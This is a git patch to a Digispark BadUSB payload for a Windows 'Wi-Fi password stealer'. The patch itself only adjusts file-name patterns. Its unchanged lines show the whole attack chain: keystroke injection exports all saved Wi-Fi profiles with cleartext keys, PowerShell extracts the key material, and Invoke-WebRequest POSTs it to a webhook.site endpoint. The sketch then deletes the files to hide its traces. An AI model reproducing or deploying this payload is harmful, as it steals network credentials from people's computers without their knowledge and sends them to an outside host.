From b814ba3f41576bcd590a4b95f773024769d95c62 Mon Sep 17 00:00:00 2001 From: Muhammad Talha Khan Date: Fri, 5 Feb 2021 15:13:26 +0500 Subject: [PATCH] Bug Fix #3 Naming scheme issue --- .../Wi-Fi password stealer/WifiKey-Grab_Minimize-of-Shame.ino | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/payloads/Wi-Fi password stealer/WifiKey-Grab_Minimize-of-Shame.ino b/payloads/Wi-Fi password stealer/WifiKey-Grab_Minimize-of-Shame.ino index d8531a8..55df70e 100644 --- a/payloads/Wi-Fi password stealer/WifiKey-Grab_Minimize-of-Shame.ino +++ b/payloads/Wi-Fi password stealer/WifiKey-Grab_Minimize-of-Shame.ino @@ -35,11 +35,11 @@ void loop() { DigiKeyboard.delay(500); DigiKeyboard.println("netsh wlan export profile key=clear"); //grabbing all the saved wifi passwd and saving them in temporary dir DigiKeyboard.delay(500); - DigiKeyboard.println("powershell Select-String -Path Wi-Fi-* -Pattern 'keyMaterial' > Wi-Fi-PASS"); //Extracting all password and saving them in Wi-Fi-Pass file in temporary dir + DigiKeyboard.println("powershell Select-String -Path Wi*.xml -Pattern 'keyMaterial' > Wi-Fi-PASS"); //Extracting all password and saving them in Wi-Fi-Pass file in temporary dir DigiKeyboard.delay(500); DigiKeyboard.println("powershell Invoke-WebRequest -Uri https://webhook.site/ -Method POST -InFile Wi-Fi-PASS"); //Submitting all passwords on hook DigiKeyboard.delay(1000); - DigiKeyboard.println("del Wi-Fi-* /s /f /q"); //cleaning up all the mess + DigiKeyboard.println("del Wi-* /s /f /q"); //cleaning up all the mess DigiKeyboard.delay(100); DigiKeyboard.println("exit"); DigiKeyboard.delay(100);